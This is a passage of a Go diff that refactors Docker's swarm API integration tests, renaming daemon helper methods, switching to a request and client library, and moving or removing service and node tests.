d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { n.Spec.Role = swarm.NodeRoleWorker }) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.False) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckControlAvailable, checker.False) + + // Wait for the role to change to worker in the cert. This is partially + // done because it's something worth testing in its own right, and + // partially because changing the role from manager to worker and then + // back to manager quickly might cause the node to pause for awhile + // while waiting for the role to change to worker, and the test can + // time out during this interval. + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + certBytes, err := ioutil.ReadFile(filepath.Join(d2.Folder, "root", "swarm", "certificates", "swarm-node.crt")) + if err != nil { + return "", check.Commentf("error: %v", err) + } + certs, err := helpers.ParseCertificatesPEM(certBytes) + if err == nil && len(certs) > 0 && len(certs[0].Subject.OrganizationalUnit) > 0 { + return certs[0].Subject.OrganizationalUnit[0], nil + } + return "", check.Commentf("could not get organizational unit from certificate") + }, checker.Equals, "swarm-worker") // Demoting last node should fail - node := d1.getNode(c, d1.NodeID) + node := d1.GetNode(c, d1.NodeID()) node.Spec.Role = swarm.NodeRoleWorker url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index) - status, out, err := d1.SockRequest("POST", url, node.Spec) + res, body, err := request.Post(url, request.Host(d1.Sock()), request.JSONBody(node.Spec)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("output: %q", string(out))) - c.Assert(string(out), checker.Contains, "last manager of the swarm") - info, err = d1.info() + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest, check.Commentf("output: %q", string(b))) + + // The warning specific to demoting the last manager is best-effort and + // won't appear until the Role field of the demoted manager has been + // updated. + // Yes, I know this looks silly, but checker.Matches is broken, since + // it anchors the regexp contrary to the documentation, and this makes + // it impossible to match something that includes a line break. + if !strings.Contains(string(b), "last manager of the swarm") { + c.Assert(string(b), checker.Contains, "this would result in a loss of quorum") + } + info = d1.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) c.Assert(info.ControlAvailable, checker.True) // Promote already demoted node - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { n.Spec.Role = swarm.NodeRoleManager }) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesEmptyList(c *check.C) { - d := s.AddDaemon(c, true, true) - - services := d.listServices(c) - c.Assert(services, checker.NotNil) - c.Assert(len(services), checker.Equals, 0, check.Commentf("services: %#v", services)) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesCreate(c *check.C) { - d := s.AddDaemon(c, true, true) - - instances := 2 - id := d.createService(c, simpleTestService, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) - - service := d.getService(c, id) - instances = 5 - d.updateService(c, service, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) - - d.removeService(c, service.ID) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesMultipleAgents(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - d3 := s.AddDaemon(c, true, false) - - time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks - - instances := 9 - id := d1.createService(c, simpleTestService, setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.GreaterThan, 0) - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - // reconciliation on d2 node down - c.Assert(d2.Stop(), checker.IsNil) - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - // test downscaling - instances = 5 - d1.updateService(c, d1.getService(c, id), setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesCreateGlobal(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - d3 := s.AddDaemon(c, true, false) - - d1.createService(c, simpleTestService, setGlobalMode) - - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, 1) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1) - waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.Equals, 1) - - d4 := s.AddDaemon(c, true, false) - d5 := s.AddDaemon(c, true, false) - - waitAndAssert(c, defaultReconciliationTimeout, d4.checkActiveContainerCount, checker.Equals, 1) - waitAndAssert(c, defaultReconciliationTimeout, d5.checkActiveContainerCount, checker.Equals, 1) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesUpdate(c *check.C) { - const nodeCount = 3 - var daemons [nodeCount]*SwarmDaemon - for i := 0; i < nodeCount; i++ { - daemons[i] = s.AddDaemon(c, true, i == 0) - } - // wait for nodes ready - waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) - - // service image at start - image1 := "busybox:latest" - // target image in update - image2 := "busybox:test" - - // create a different tag - for _, d := range daemons { - out, err := d.Cmd("tag", image1, image2) - c.Assert(err, checker.IsNil, check.Commentf(out)) - } - - // create service - instances := 5 - parallelism := 2 - id := daemons[0].createService(c, serviceForUpdate, setInstances(instances)) - - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances}) - - // issue service update - service := daemons[0].getService(c, id) - daemons[0].updateService(c, service, setImage(image2)) - - // first batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances - parallelism, image2: parallelism}) - - // 2nd batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) - - // 3nd batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image2: instances}) - - // Roll back to the previous version. This uses the CLI because - // rollback is a client-side operation. - out, err := daemons[0].Cmd("service", "update", "--rollback", id) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - // first batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image2: instances - parallelism, image1: parallelism}) - - // 2nd batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image2: instances - 2*parallelism, image1: 2 * parallelism}) - - // 3nd batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances}) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesFailedUpdate(c *check.C) { - const nodeCount = 3 - var daemons [nodeCount]*SwarmDaemon - for i := 0; i < nodeCount; i++ { - daemons[i] = s.AddDaemon(c, true, i == 0) - } - // wait for nodes ready - waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) - - // service image at start - image1 := "busybox:latest" - // target image in update - image2 := "busybox:badtag" - - // create service - instances := 5 - id := daemons[0].createService(c, serviceForUpdate, setInstances(instances)) - - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances}) - - // issue service update - service := daemons[0].getService(c, id) - daemons[0].updateService(c, service, setImage(image2), setFailureAction(swarm.UpdateFailureActionPause), setMaxFailureRatio(0.25), setParallelism(1)) - - // should update 2 tasks and then pause - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceUpdateState(id), checker.Equals, swarm.UpdateStatePaused) - v, _ := daemons[0].checkServiceRunningTasks(id)(c) - c.Assert(v, checker.Equals, instances-2) - - // Roll back to the previous version. This uses the CLI because - // rollback is a client-side operation. - out, err := daemons[0].Cmd("service", "update", "--rollback", id) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances}) -} - -func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintRole(c *check.C) { - const nodeCount = 3 - var daemons [nodeCount]*SwarmDaemon - for i := 0; i < nodeCount; i++ { - daemons[i] = s.AddDaemon(c, true, i == 0) - } - // wait for nodes ready - waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) - - // create service - constraints := []string{"node.role==worker"} - instances := 3 - id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - // validate tasks are running on worker nodes - tasks := daemons[0].getServiceTasks(c, id) - for _, task := range tasks { - node := daemons[0].getNode(c, task.NodeID) - c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleWorker) - } - //remove service - daemons[0].removeService(c, id) - - // create service - constraints = []string{"node.role!=worker"} - id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - tasks = daemons[0].getServiceTasks(c, id) - // validate tasks are running on manager nodes - for _, task := range tasks { - node := daemons[0].getNode(c, task.NodeID) - c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleManager) - } - //remove service - daemons[0].removeService(c, id) - - // create service - constraints = []string{"node.role==nosuchrole"} - id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks created - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) - // let scheduler try - time.Sleep(250 * time.Millisecond) - // validate tasks are not assigned to any node - tasks = daemons[0].getServiceTasks(c, id) - for _, task := range tasks { - c.Assert(task.NodeID, checker.Equals, "") - } -} - -func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintLabel(c *check.C) { - const nodeCount = 3 - var daemons [nodeCount]*SwarmDaemon - for i := 0; i < nodeCount; i++ { - daemons[i] = s.AddDaemon(c, true, i == 0) - } - // wait for nodes ready - waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) - nodes := daemons[0].listNodes(c) - c.Assert(len(nodes), checker.Equals, nodeCount) - - // add labels to nodes - daemons[0].updateNode(c, nodes[0].ID, func(n *swarm.Node) { - n.Spec.Annotations.Labels = map[string]string{ - "security": "high", - } - }) - for i := 1; i < nodeCount; i++ { - daemons[0].updateNode(c, nodes[i].ID, func(n *swarm.Node) { - n.Spec.Annotations.Labels = map[string]string{ - "security": "low", - } - }) - } - - // create service - instances := 3 - constraints := []string{"node.labels.security==high"} - id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - tasks := daemons[0].getServiceTasks(c, id) - // validate all tasks are running on nodes[0] - for _, task := range tasks { - c.Assert(task.NodeID, checker.Equals, nodes[0].ID) - } - //remove service - daemons[0].removeService(c, id) - - // create service - constraints = []string{"node.labels.security!=high"} - id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - tasks = daemons[0].getServiceTasks(c, id) - // validate all tasks are NOT running on nodes[0] - for _, task := range tasks { - c.Assert(task.NodeID, checker.Not(checker.Equals), nodes[0].ID) - } - //remove service - daemons[0].removeService(c, id) - - constraints = []string{"node.labels.security==medium"} - id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks created - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) - // let scheduler try - time.Sleep(250 * time.Millisecond) - tasks = daemons[0].getServiceTasks(c, id) - // validate tasks are not assigned - for _, task := range tasks { - c.Assert(task.NodeID, checker.Equals, "") - } - //remove service - daemons[0].removeService(c, id) - - // multiple constraints - constraints = []string{ - "node.labels.security==high", - fmt.Sprintf("node.id==%s", nodes[1].ID), - } - id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks created - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) - // let scheduler try - time.Sleep(250 * time.Millisecond) - tasks = daemons[0].getServiceTasks(c, id) - // validate tasks are not assigned - for _, task := range tasks { - c.Assert(task.NodeID, checker.Equals, "") - } - // make nodes[1] fulfills the constraints - daemons[0].updateNode(c, nodes[1].ID, func(n *swarm.Node) { - n.Spec.Annotations.Labels = map[string]string{ - "security": "high", - } - }) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - tasks = daemons[0].getServiceTasks(c, id) - for _, task := range tasks { - c.Assert(task.NodeID, checker.Equals, nodes[1].ID) - } -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesStateReporting(c *check.C) { - testRequires(c, SameHostDaemon) - testRequires(c, DaemonIsLinux) - - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, true) - d3 := s.AddDaemon(c, true, false) - - time.Sleep(1 * time.Second) // make sure all daemons are ready to accept - - instances := 9 - d1.createService(c, simpleTestService, setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - getContainers := func() map[string]*SwarmDaemon { - m := make(map[string]*SwarmDaemon) - for _, d := range []*SwarmDaemon{d1, d2, d3} { - for _, id := range d.activeContainers() { - m[id] = d - } - } - return m - } - - containers := getContainers() - c.Assert(containers, checker.HasLen, instances) - var toRemove string - for i := range containers { - toRemove = i - } - - _, err := containers[toRemove].Cmd("stop", toRemove) - c.Assert(err, checker.IsNil) - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - containers2 := getContainers() - c.Assert(containers2, checker.HasLen, instances) - for i := range containers { - if i == toRemove { - c.Assert(containers2[i], checker.IsNil) - } else { - c.Assert(containers2[i], checker.NotNil) - } - } - - containers = containers2 - for i := range containers { - toRemove = i - } - - // try with killing process outside of docker - pidStr, err := containers[toRemove].Cmd("inspect", "-f", "{{.State.Pid}}", toRemove) - c.Assert(err, checker.IsNil) - pid, err := strconv.Atoi(strings.TrimSpace(pidStr)) - c.Assert(err, checker.IsNil) - c.Assert(syscall.Kill(pid, syscall.SIGKILL), checker.IsNil) - - time.Sleep(time.Second) // give some time to handle the signal - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - containers2 = getContainers() - c.Assert(containers2, checker.HasLen, instances) - for i := range containers { - if i == toRemove { - c.Assert(containers2[i], checker.IsNil) - } else { - c.Assert(containers2[i], checker.NotNil) - } - } + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckControlAvailable, checker.True) } func (s *DockerSwarmSuite) TestAPISwarmLeaderProxy(c *check.C) { @@ -599,20 +275,20 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderProxy(c *check.C) { d3 := s.AddDaemon(c, true, true) // start a service by hitting each of the 3 managers - d1.createService(c, simpleTestService, func(s *swarm.Service) { + d1.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "test1" }) - d2.createService(c, simpleTestService, func(s *swarm.Service) { + d2.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "test2" }) - d3.createService(c, simpleTestService, func(s *swarm.Service) { + d3.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "test3" }) // 3 services should be started now, because the requests were proxied to leader // query each node and make sure it returns 3 services - for _, d := range []*SwarmDaemon{d1, d2, d3} { - services := d.listServices(c) + for _, d := range []*daemon.Daemon{d1, d2, d3} { + services := d.ListServices(c) c.Assert(services, checker.HasLen, 3) } } @@ -624,23 +300,23 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { d3 := s.AddDaemon(c, true, true) // assert that the first node we made is the leader, and the other two are followers - c.Assert(d1.getNode(c, d1.NodeID).ManagerStatus.Leader, checker.True) - c.Assert(d1.getNode(c, d2.NodeID).ManagerStatus.Leader, checker.False) - c.Assert(d1.getNode(c, d3.NodeID).ManagerStatus.Leader, checker.False) + c.Assert(d1.GetNode(c, d1.NodeID()).ManagerStatus.Leader, checker.True) + c.Assert(d1.GetNode(c, d2.NodeID()).ManagerStatus.Leader, checker.False) + c.Assert(d1.GetNode(c, d3.NodeID()).ManagerStatus.Leader, checker.False) - d1.Stop() // stop the leader + d1.Stop(c) var ( - leader *SwarmDaemon // keep track of leader - followers []*SwarmDaemon // keep track of followers + leader *daemon.Daemon // keep track of leader + followers []*daemon.Daemon // keep track of followers ) - checkLeader := func(nodes ...*SwarmDaemon) checkF { + checkLeader := func(nodes ...*daemon.Daemon) checkF { return func(c *check.C) (interface{}, check.CommentInterface) { // clear these out before each run leader = nil followers = nil for _, d := range nodes { - if d.getNode(c, d.NodeID).ManagerStatus.Leader { + if d.GetNode(c, d.NodeID()).ManagerStatus.Leader { leader = d } else { followers = append(followers, d) @@ -651,7 +327,7 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { return false, check.Commentf("no leader elected") } - return true, check.Commentf("elected %v", leader.id) + return true, check.Commentf("elected %v", leader.ID()) } } @@ -665,7 +341,7 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { stableleader := leader // add the d1, the initial leader, back - d1.Start() + d1.Start(c) // TODO(stevvooe): may need to wait for rejoin here @@ -677,7 +353,7 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaderElection(c *check.C) { c.Assert(leader, checker.NotNil) c.Assert(followers, checker.HasLen, 2) // and that after we added d1 back, the leader hasn't changed - c.Assert(leader.NodeID, checker.Equals, stableleader.NodeID) + c.Assert(leader.NodeID(), checker.Equals, stableleader.NodeID()) } func (s *DockerSwarmSuite) TestAPISwarmRaftQuorum(c *check.C) { @@ -685,172 +361,58 @@ func (s *DockerSwarmSuite) TestAPISwarmRaftQuorum(c *check.C) { d2 := s.AddDaemon(c, true, true) d3 := s.AddDaemon(c, true, true) - d1.createService(c, simpleTestService) + d1.CreateService(c, simpleTestService) - c.Assert(d2.Stop(), checker.IsNil) + d2.Stop(c) // make sure there is a leader - waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckLeader, checker.IsNil) - d1.createService(c, simpleTestService, func(s *swarm.Service) { + d1.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "top1" }) - c.Assert(d3.Stop(), checker.IsNil) - - // make sure there is a leader - waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + d3.Stop(c) var service swarm.Service simpleTestService(&service) service.Spec.Name = "top2" - status, out, err := d1.SockRequest("POST", "/services/create", service.Spec) + cli, err := d1.NewClient() c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("deadline exceeded", string(out))) + defer cli.Close() + + // d1 will eventually step down from leader because there is no longer an active quorum, wait for that to happen + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + _, err = cli.ServiceCreate(context.Background(), service.Spec, types.ServiceCreateOptions{}) + return err.Error(), nil + }, checker.Contains, "Make sure more than half of the managers are online.") - c.Assert(d2.Start(), checker.IsNil) + d2.Start(c) // make sure there is a leader - waitAndAssert(c, defaultReconciliationTimeout, d1.checkLeader, checker.IsNil) + waitAndAssert(c, defaultReconciliationTimeout, d1.CheckLeader, checker.IsNil) - d1.createService(c, simpleTestService, func(s *swarm.Service) { + d1.CreateService(c, simpleTestService, func(s *swarm.Service) { s.Spec.Name = "top3" }) } -func (s *DockerSwarmSuite) TestAPISwarmListNodes(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - d3 := s.AddDaemon(c, true, false) - - nodes := d1.listNodes(c) - c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) - -loop0: - for _, n := range nodes { - for _, d := range []*SwarmDaemon{d1, d2, d3} { - if n.ID == d.NodeID { - continue loop0 - } - } - c.Errorf("unknown nodeID %v", n.ID) - } -} - -func (s *DockerSwarmSuite) TestAPISwarmNodeUpdate(c *check.C) { - d := s.AddDaemon(c, true, true) - - nodes := d.listNodes(c) - - d.updateNode(c, nodes[0].ID, func(n *swarm.Node) { - n.Spec.Availability = swarm.NodeAvailabilityPause - }) - - n := d.getNode(c, nodes[0].ID) - c.Assert(n.Spec.Availability, checker.Equals, swarm.NodeAvailabilityPause) -} - -func (s *DockerSwarmSuite) TestAPISwarmNodeRemove(c *check.C) { - testRequires(c, Network) - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - _ = s.AddDaemon(c, true, false) - - nodes := d1.listNodes(c) - c.Assert(len(nodes), checker.Equals, 3, check.Commentf("nodes: %#v", nodes)) - - // Getting the info so we can take the NodeID - d2Info, err := d2.info() - c.Assert(err, checker.IsNil) - - // forceful removal of d2 should work - d1.removeNode(c, d2Info.NodeID, true) - - nodes = d1.listNodes(c) - c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) - - // Restart the node that was removed - err = d2.Restart() - c.Assert(err, checker.IsNil) - - // Give some time for the node to rejoin - time.Sleep(1 * time.Second) - - // Make sure the node didn't rejoin - nodes = d1.listNodes(c) - c.Assert(len(nodes), checker.Equals, 2, check.Commentf("nodes: %#v", nodes)) -} - -func (s *DockerSwarmSuite) TestAPISwarmNodeDrainPause(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - - time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks - - // start a service, expect balanced distribution - instances := 8 - id := d1.createService(c, simpleTestService, setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) - - // drain d2, all containers should move to d1 - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { - n.Spec.Availability = swarm.NodeAvailabilityDrain - }) - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 0) - - // set d2 back to active - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { - n.Spec.Availability = swarm.NodeAvailabilityActive - }) - - instances = 1 - d1.updateService(c, d1.getService(c, id), setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) - - instances = 8 - d1.updateService(c, d1.getService(c, id), setInstances(instances)) - - // drained node first so we don't get any old containers - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout*2, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount), checker.Equals, instances) - - d2ContainerCount := len(d2.activeContainers()) - - // set d2 to paused, scale service up, only d1 gets new tasks - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { - n.Spec.Availability = swarm.NodeAvailabilityPause - }) - - instances = 14 - d1.updateService(c, d1.getService(c, id), setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, instances-d2ContainerCount) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, d2ContainerCount) - -} - func (s *DockerSwarmSuite) TestAPISwarmLeaveRemovesContainer(c *check.C) { d := s.AddDaemon(c, true, true) instances := 2 - d.createService(c, simpleTestService, setInstances(instances)) + d.CreateService(c, simpleTestService, setInstances(instances)) id, err := d.Cmd("run", "-d", "busybox", "top") c.Assert(err, checker.IsNil) id = strings.TrimSpace(id) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances+1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, instances+1) - c.Assert(d.Leave(false), checker.NotNil) - c.Assert(d.Leave(true), checker.IsNil) + c.Assert(d.SwarmLeave(false), checker.NotNil) + c.Assert(d.SwarmLeave(true), checker.IsNil) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) id2, err := d.Cmd("ps", "-q") c.Assert(err, checker.IsNil) @@ -867,19 +429,20 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaveOnPendingJoin(c *check.C) { c.Assert(err, checker.IsNil) id = strings.TrimSpace(id) - err = d2.Join(swarm.JoinRequest{ + c2 := d2.NewClientT(c) + err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), RemoteAddrs: []string{"123.123.123.123:1234"}, }) c.Assert(err, check.NotNil) c.Assert(err.Error(), checker.Contains, "Timeout was reached") - info, err := d2.info() - c.Assert(err, checker.IsNil) + info := d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStatePending) - c.Assert(d2.Leave(true), checker.IsNil) + c.Assert(d2.SwarmLeave(true), checker.IsNil) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckActiveContainerCount, checker.Equals, 1) id2, err := d2.Cmd("ps", "-q") c.Assert(err, checker.IsNil) @@ -890,19 +453,20 @@ func (s *DockerSwarmSuite) TestAPISwarmLeaveOnPendingJoin(c *check.C) { func (s *DockerSwarmSuite) TestAPISwarmRestoreOnPendingJoin(c *check.C) { testRequires(c, Network) d := s.AddDaemon(c, false, false) - err := d.Join(swarm.JoinRequest{ + client := d.NewClientT(c) + err := client.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d.SwarmListenAddr(), RemoteAddrs: []string{"123.123.123.123:1234"}, }) c.Assert(err, check.NotNil) c.Assert(err.Error(), checker.Contains, "Timeout was reached") - waitAndAssert(c, defaultReconciliationTimeout, d.checkLocalNodeState, checker.Equals, swarm.LocalNodeStatePending) + waitAndAssert(c, defaultReconciliationTimeout, d.CheckLocalNodeState, checker.Equals, swarm.LocalNodeStatePending) - c.Assert(d.Stop(), checker.IsNil) - c.Assert(d.Start(), checker.IsNil) + d.Stop(c) + d.Start(c) - info, err := d.info() - c.Assert(err, checker.IsNil) + info := d.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) } @@ -910,43 +474,43 @@ func (s *DockerSwarmSuite) TestAPISwarmManagerRestore(c *check.C) { d1 := s.AddDaemon(c, true, true) instances := 2 - id := d1.createService(c, simpleTestService, setInstances(instances)) + id := d1.CreateService(c, simpleTestService, setInstances(instances)) - d1.getService(c, id) - d1.Stop() - d1.Start() - d1.getService(c, id) + d1.GetService(c, id) + d1.Stop(c) + d1.Start(c) + d1.GetService(c, id) d2 := s.AddDaemon(c, true, true) - d2.getService(c, id) - d2.Stop() - d2.Start() - d2.getService(c, id) + d2.GetService(c, id) + d2.Stop(c) + d2.Start(c) + d2.GetService(c, id) d3 := s.AddDaemon(c, true, true) - d3.getService(c, id) - d3.Stop() - d3.Start() - d3.getService(c, id) + d3.GetService(c, id) + d3.Stop(c) + d3.Start(c) + d3.GetService(c, id) d3.Kill() time.Sleep(1 * time.Second) // time to handle signal - d3.Start() - d3.getService(c, id) + d3.Start(c) + d3.GetService(c, id) } func (s *DockerSwarmSuite) TestAPISwarmScaleNoRollingUpdate(c *check.C) { d := s.AddDaemon(c, true, true) instances := 2 - id := d.createService(c, simpleTestService, setInstances(instances)) + id := d.CreateService(c, simpleTestService, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) - containers := d.activeContainers() + 